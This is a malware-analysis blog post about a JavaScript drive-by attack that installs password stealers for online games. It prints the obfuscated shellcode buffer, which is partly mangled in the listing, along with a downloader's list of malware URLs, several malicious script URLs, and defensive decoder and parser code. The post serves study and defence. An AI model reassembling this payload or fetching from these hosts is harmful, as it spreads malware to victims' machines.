MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

5.2.09

Exploitation of vulnerabilities through JS

Exploiting vulnerabilities through different file formats has become a commonplace and heavily used method among the creators and distributors of malware.

Combined with other strategies, these methods become a time bomb that is detonated by the simple act of visiting a page that has been maliciously manipulated to host the attack.

Numerous cases of weaknesses exploited through .js, .swf, .pdf and .mp3 files, and even through binaries posing as .css files, show that any file type can serve as a distribution channel and just as readily as an infection vector.

In recent weeks a wave of .js files has been used to redirect victims to malicious code downloads through obfuscated scripts hidden in the body of the JavaScript, like the following one, hosted at http://www710sese.cn/a1/realdadong.js (MD5 d1094b907dfe99784b206d2ae9b1fe97):

var mybr = unescape("%u17eb%u6090%u645e%u0000%u30a1%u0800%u0500%uf88b%u0000%u00b9%u0004%uf300%uffa4
%ue8e0%uffe4%ua164%uffff%u0030%u0000%u408b%u8b0c%u1c70%u8bad%uec81%u0870%u0200%u0000%uec8b
%ue8bb%%u020f%u8503%u8b00 ub u0fc0%B85%u0000%uff00%ue903%u0221%u0000%u205d%u895b%u6856%cfu98
%u0e8a%ub1e8%u0000%u8900%u6856%u0c45%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%uc61b%u6856%u7946%u87e8%u0000%u8900%u1045%u6856%ufca
%u7c0d%u79e8%u0000%u8900%u0845%u84e7%u6856%ub469%u6be8%u0000%u8900%u1445%u020f%ue0bb
%uc7f6%u8900%u3303%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u285d%u8d00%uff53%u0455%u6850%u1a36
%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u55ff%u5328%u0544%uc71c%u5c28%u652e%uc778%u0544
%u652c%u0000%u5600%u287d%u8d56%uff57%uff56%u2075%u2455%u5756%u55ff%ue80c%u0062%u0000
%uc481%u0200%u0000%u3361%u0004%uc2c0%u8b55%u51ec%u8b53%u087d%u5d8b%u738b%u560c%u8b3c%u1e74
%u56f3%u0378%u768b%u0320%u33f3%uuad41%49c9%u3356%uc303%u0ff6%u10be%uf23a%u0874%ucec1
%u030d%u40f2%uf uf1eb%u755e%E3B%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b
%uu5ec5%038b%uc25d%u595b%u0008%u92e9%u0000%u5e00%u80bf%ub900%u020c%u0100%u0000%ua4f3
%uec81%u0100%u0000%ufc8b%uc783%uc710%u6474%u6e07%uc76c%u0447%u006c%u0000%u0455%u458%uff579
%uc724%u6c74%u5207%u0447%uc741%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u55ff
%5057%u8b08%ub8f0%u0fe4%u0002%u07c7%u3089%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff
%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u5508%u348d%u406a%u046th%uff56
%u1055%u06c7%u0c80%uc481%u0002%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9
%u020f%u8b00%u75db%u8519%u3350%u33c9%u83db%uub70f%06e8%ufffb%u8118%u0015%u833e%u7500
%ub70f%u06e8%u8118%u0035%ufffb%u7500%u8330%ub70f%u02e8%u8318%u2575%u6afb%u8b04%uc083%ub830u0fe0%
%u0002%u0068%u0000%u6801%u0000%u1000%u10ff%u006a%u0689%u4489%u1824%uecb9%u020f%uff00
%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f%u772e%u6965
%u632e%u6b78%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073");

The point is that, buried in this obfuscated script, is code that downloads a binary from a different URL. The file is named a1.css so that it passes for a stylesheet (Cascading Style Sheets), but it is a binary, not a style sheet: the trailing %u escapes of the buffer are that download URL written two bytes per unit in little-endian order, and they decode to a string that starts with http:// and ends in /new/a1.css. This binary is malware.
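To see what a buffer like this carries without running it, the following decoder (added here as an example; it is not code from the original post or from the malware) converts an unescape() string back to raw bytes and lists the printable strings in it, which is where the payload URL of such shellcode normally sits. The buffer it runs on is constructed for the example, with a hypothetical host (example.invalid), and the parser tolerates the whitespace that copying and web extraction insert between tokens, as seen in the listing above.

```javascript
// Added example, not part of the original post: decode a JScript-style
// unescape("%uXXXX...") shellcode buffer into bytes and pull out the
// printable strings (typically the download URL at the end of the buffer).

// Parse %uXXXX tokens (one UTF-16 code unit, emitted low byte first, the
// order unescape() leaves it in memory) and plain %XX tokens. Whitespace
// between tokens or between '%' and 'u' is skipped, and an upper-case 'U'
// is accepted, because that is how copy/paste and extraction mangle
// these strings. Tokens with a wrong digit count are ignored.
function unescapeToBytes(s) {
  const out = [];
  const re = /%\s*u\s*([0-9a-f]{4})|%\s*([0-9a-f]{2})/gi;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      out.push(unit & 0xff, (unit >> 8) & 0xff);   // little-endian
    } else {
      out.push(parseInt(m[2], 16));
    }
  }
  return Uint8Array.from(out);
}

// Return runs of at least minLen printable ASCII bytes, like strings(1).
function extractStrings(bytes, minLen = 6) {
  const found = [];
  let cur = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) found.push(cur);
      cur = '';
    }
  }
  if (cur.length >= minLen) found.push(cur);
  return found;
}

// Inverse of the decoder; used here only to build the constructed sample.
// Odd-length input is NUL-padded, which also terminates the C string.
function toUnicodeEscapes(str) {
  const bytes = Array.from(str, c => c.charCodeAt(0));
  if (bytes.length % 2) bytes.push(0);
  let s = '';
  for (let i = 0; i < bytes.length; i += 2) {
    const unit = bytes[i] | (bytes[i + 1] << 8);
    s += '%u' + unit.toString(16).padStart(4, '0');
  }
  return s;
}

// Only the strings that look like a URL are of interest as download targets.
function payloadUrls(escaped) {
  return extractStrings(unescapeToBytes(escaped))
    .filter(s => /^https?:\/\//.test(s));
}

// Constructed sample (hypothetical host): a few opcode-looking units, with
// the stray spaces seen in the post's listing, followed by a payload URL.
const SAMPLE = '%u17eb% u6090%u645e %u0000 ' +
  toUnicodeEscapes('http://example.invalid/new/a1.css');

console.log(payloadUrls(SAMPLE));   // → [ 'http://example.invalid/new/a1.css' ]
```

Running the same decoder over the post's buffer gives the string discussed above; everything before it is machine code, which is why extractStrings() only reports the URL and not the short runs of accidental printable bytes in the opcode section.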



Furthermore, in the middle of the infection process, which lasts only a few seconds, the victim is also made to connect to txt.hsdee.com and www.wdswe.com. The former serves a Drive-by Update through the file oo.txt: when it answers with a 200 "OK", the binaries listed in that file are downloaded, the first one from http://www.wdswe.com/new/new1.exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

The contents of that text file are:

[file]
open = and
url1 = http://www.wdswe .com/new/new1. exe
url2 = http://www.wdswe .com/new/new2. exe
url3 = http://www.wdswe .com/new/new3. exe
url4 = http://www.wdswe .com/new/new4. exe
url5 = http://www.wdswe .com/new/new5. exe
url6 = http://www.wdswe .com/new/new6. exe
url7 = http://www.wdswe .com/new/new7. exe
url8 = http://www.wdswe .com/new/new8. exe
url9 = http://www.wdswe .com/new/new9. exe
url10 = http://www.wdswe .com/new/new10. exe
url11 = http://www.wdswe .com/new/new11. exe
url12 = http://www.wdswe .com/new/new12. exe
url13 = http://www.wdswe .com/new/new13. exe
url14 = http://www.wdswe .com/new/new14. exe
url15 = http://www.wdswe .com/new/new15. exe
url16 = http://www1.wdswe .com/new/new16. exe
url17 = http://www1.wdswe .com/new/new17. exe
url18 = http://www1.wdswe .com/new/new18. exe
url19 = http://www1.wdswe .com/new/new19. exe
url20 = http://www1.wdswe .com/new/new20. exe
url21 = http://www1.wdswe .com/new/new21. exe
url22 = http://www1.wdswe .com/new/new22. exe
url23 = http://www1.wdswe .com/new/new23. exe
url24 = http://www1.wdswe .com/new/new24. exe
url25 = http://www1.wdswe .com/new/new25. exe
url26 = http://www1.wdswe .com/new/new26. exe
url27 = http://www1.wdswe .com/new/new27. exe
url28 = http://www1.wdswe .com/new/new28. exe
count = 28
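The update list above is a small INI-style file, and an analyst triaging a Drive-by Update like the one described (fetch the text file, download every listed binary once the server answers 200 OK) wants it turned into a checked list of targets rather than read by eye. The parser below is an added example, not code from the original post or from the downloader; it handles the [file] section with open=, url1..urlN and count=, re-joins the whitespace that defanging or extraction inserts into the URLs, groups targets by host, and flags a count= that does not match the number of url entries. The sample list it parses is constructed, with hypothetical hosts.

```javascript
// Added example, not part of the original post: parse the oo.txt-style
// update list a Drive-by Update downloader fetches and check it.

// Minimal INI reader: sections in [brackets], key = value lines,
// ';' or '#' comments. Keys and section names are lower-cased.
function parseUpdateList(text) {
  const sections = {};
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(';') || line.startsWith('#')) continue;
    const sec = line.match(/^\[(.+)\]$/);
    if (sec) {
      current = sec[1].trim().toLowerCase();
      sections[current] = {};
      continue;
    }
    const kv = line.match(/^([^=]+?)\s*=\s*(.*)$/);
    if (kv && current) sections[current][kv[1].trim().toLowerCase()] = kv[2].trim();
  }
  return sections;
}

// Defanged or extracted URLs look like "www.wdswe .com/new/new1. exe";
// the downloader never sees those spaces, so remove them before parsing.
function refang(url) {
  return url.replace(/\s+/g, '');
}

// Walk url1, url2, ... until the first missing index and summarise.
function updateTargets(text) {
  const file = parseUpdateList(text).file || {};
  const declared = parseInt(file.count, 10);
  const urls = [];
  for (let i = 1; file['url' + i] !== undefined; i++) {
    urls.push(refang(file['url' + i]));
  }
  const byHost = {};
  for (const u of urls) {
    const host = new URL(u).hostname;
    byHost[host] = (byHost[host] || 0) + 1;
  }
  return {
    open: file.open,
    declared: Number.isNaN(declared) ? null : declared,
    urls,
    // A mismatch means either a truncated fetch or a list that is being edited.
    countMatches: declared === urls.length,
    byHost,
  };
}

// Constructed sample in the same shape as the oo.txt above (hypothetical hosts).
// count= deliberately disagrees with the number of entries.
const SAMPLE_LIST = `[file]
open = and
url1 = http://www.example .invalid/new/new1. exe
url2 = http://www.example .invalid/new/new2. exe
url3 = http://www1.example .invalid/new/new3. exe
count = 4
`;

console.log(updateTargets(SAMPLE_LIST));
```

The host breakdown is what feeds blocking: in the real list above, every binary comes from www.wdswe.com or www1.wdswe.com, so a single domain block covers all 28 downloads, while the distribution host txt.hsdee.com that serves the list itself is a separate indicator.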


The result is an infection with several malicious codes, most of them designed to steal authentication credentials for online games such as WoW.

Other URLs used to spread malware in the same way include:

http://97.haowyt .com / js / baidu. js

http://www.163wyt .com / js / yahoo. js

http://www.710sese .cn/a1/hohogl. js

http://www.710sese .cn/a1/wokaono. js

http://www.710sese .cn/a1/woriniss. js

http://qq.18i16 .net / lzz. js

http://qq.18i16 .net / bf. js

http://qq.18i16 .net / realplay. js

http://qq.18i16 .net / new. js

http://qq.18i16 .net / cx. js

http://www.baomaaa .cn/a1/realdadong. js

http://www.baomaaa .cn/a1/hohogl. js

http://www.baomaaa .cn/a1/wokaono. js

http://www.baomaaa .cn/a1/woriniss. js

http://tj.gan7788 .com / js / js. js

http://sss.2010wyt. net / r. js

http://sss.2010wyt .net/614. js


Despite the advanced infection techniques used by malware creators, there is one fundamental measure that prevents becoming a victim of attacks of this kind, clearly centred on keeping software fully up to date, applications included.

Related information
Drive-by Update to spread malware
New strategy to disseminate scareware IS
Massive exploitation of vulnerabilities through gh...
Danmec Bot, Fast-Flux networks and recruitment of ...
Schematic analysis of an attack from Web-based mal...

Jorge Mieres
